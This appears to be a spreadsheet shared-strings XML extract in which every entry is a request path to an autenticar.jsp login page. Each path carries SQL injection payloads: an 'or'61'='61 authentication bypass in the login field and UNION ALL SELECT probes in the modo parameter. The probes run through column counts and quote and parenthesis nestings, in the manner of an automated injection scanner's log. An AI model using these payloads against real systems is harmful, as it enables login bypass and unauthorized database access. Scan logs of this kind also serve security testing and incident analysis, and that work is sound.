  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'czpq'like'czpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'fwzs'like'fwzs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'avqk'like'avqk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'tfmi'like'tfmi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'zpes'like'zpes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--and'qcwz'like'qcwz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--and'besi'like'besi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--and'oskp'like'oskp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("ycil"="ycil</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("dznq"="dznq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("bvho"="bvho</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("zyng"="zyng</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("kmfs"="kmfs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("zhhh"="zhhh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("qghf"="qghf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--and("jaud"="jaud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--and("wyfi"="wyfi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--and("cide"="cide</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("xoir"="xoir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("onxn"="onxn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("fmsk"="fmsk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("uwah"="uwah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("jyru"="jyru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("aofu"="aofu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("obtz"="obtz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--and(("mcvo"="mcvo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--and(("msof"="msof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--and(("xeyj"="xeyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("zpek"="zpek</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("vouy"="vouy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("rtwm"="rtwm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("nevm"="nevm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("ybbf"="ybbf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("ceye"="ceye</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("zcvp"="zcvp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--and((("qcuv"="qcuv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--and((("yxwa"="yxwa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--and((("jbvz"="jbvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"eueo"="eueo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"wewf"="wewf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"oats"="oats</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"byyu"="byyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"vwxk"="vwxk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"mmcn"="mmcn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"uxtd"="uxtd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--and"hbcs"="hbcs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--and"musx"="musx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--and"acqe"="acqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("wsdn"like"wsdn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("lzqs"like"lzqs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("punh"like"punh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("xiug"like"xiug</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("avee"like"avee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("makn"like"makn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("gcob"like"gcob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--and("kixv"like"kixv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--and("klnh"like"klnh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--and("piyi"like"piyi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("qbma"like"qbma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("kncy"like"kncy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("fkzy"like"fkzy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("rqhv"like"rqhv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("wwjp"like"wwjp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("kcri"like"kcri</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("clya"like"clya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--and(("vbqo"like"vbqo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--and(("ebxj"like"ebxj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--and(("cmeo"like"cmeo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("bwso"like"bwso</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("fefk"like"fefk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("kaey"like"kaey</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("eddb"like"eddb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("dyvq"like"dyvq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("dmxi"like"dmxi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("psze"like"psze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--and((("wnnb"like"wnnb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--and((("zljg"like"zljg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--and((("tcny"like"tcny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"buyo"like"buyo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ybkb"like"ybkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"kjjh"like"kjjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"wvhg"like"wvhg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"qmzl"like"qmzl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"crgv"like"crgv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ybvm"like"ybvm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--and"odvn"like"odvn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--and"vbdj"like"vbdj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--and"tpnx"like"tpnx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224,1224--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806,7806--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189,8189--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639,9639--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790,8790--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227,1227--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689,7689--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705,6705--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713,4713--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824,4824--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407,5407--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993,993--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574,1574--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019,6019--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574,7574--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326,5326--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566,2566--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095,8095--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111,2111--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286,3286--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478,7478--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776,4776--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542,5542--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054,2054--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714,8714--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426,5426--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492,4492--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565--</t>
  </si>
  <si>
